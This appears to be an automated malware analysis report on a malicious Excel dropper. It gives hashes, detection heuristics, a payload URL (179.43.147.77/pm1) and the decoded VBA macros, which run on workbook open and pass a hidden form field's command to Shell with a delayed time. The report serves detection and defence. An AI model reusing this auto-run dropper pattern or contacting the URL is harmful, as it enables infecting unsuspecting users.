Office (OLE) malware analysis — malicious · eb3792fc83cd6582

MALICIOUS

Office (OLE)

171.0 KB Created: 2019-06-19 17:19:06 Authoring application: Microsoft Excel First seen: 2021-04-10

MD5: a3d9a18d6f69d17373800548d24514ff SHA-1: 7bb22bc28a9ae4a2bc65ed2b417fc484a024762e SHA-256: eb3792fc83cd65823bc466e7253caf12064826b058230666d2ed51542ac59275

190 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Agent-6997784-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6997784-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell Replace(App2.T3.Text, "77:77", time)
```
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Matched line in script
```
CallByName App1, "Show", VbMethod
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub WorkBook_open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://179.43.147.77/pm1 In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2151 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2151 bytes
SHA-256: `4c2cc2a23c5ac521f82bd6e4fba75f965f315d6919c6f858ff194f0b0d01d50c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ЭтаКнига" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub WorkBook_open() CallByName App1, "Show", VbMethod End Sub Attribute VB_Name = "Лист1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Лист2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Лист3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "App1" Attribute VB_Base = "0{8DD5B6EF-B8D2-4811-A4A7-C12EFB568CC1}{741B5E35-6768-4E31-B033-44B9461CB8BB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Activate() On Error Resume Next Dim time time = Format(Now + TimeSerial(0, 0, 24), "hh:mm") Shell Replace(App2.T3.Text, "77:77", time) Unload Me End Sub Attribute VB_Name = "App2" Attribute VB_Base = "0{5B9317EE-FE44-48EE-8F1B-6AE4A0E2F3B9}{79E551CC-6958-4C16-821B-7840C191A158}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 4c2cc2a23c5ac521f82bd6e4fba75f965f315d6919c6f858ff194f0b0d01d50c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
CallByName App1, "Show", VbMethod

End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "App1"
Attribute VB_Base = "0{8DD5B6EF-B8D2-4811-A4A7-C12EFB568CC1}{741B5E35-6768-4E31-B033-44B9461CB8BB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
On Error Resume Next
Dim time
time = Format(Now + TimeSerial(0, 0, 24), "hh:mm")


Shell Replace(App2.T3.Text, "77:77", time)
Unload Me
End Sub



Attribute VB_Name = "App2"
Attribute VB_Base = "0{5B9317EE-FE44-48EE-8F1B-6AE4A0E2F3B9}{79E551CC-6958-4C16-821B-7840C191A158}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.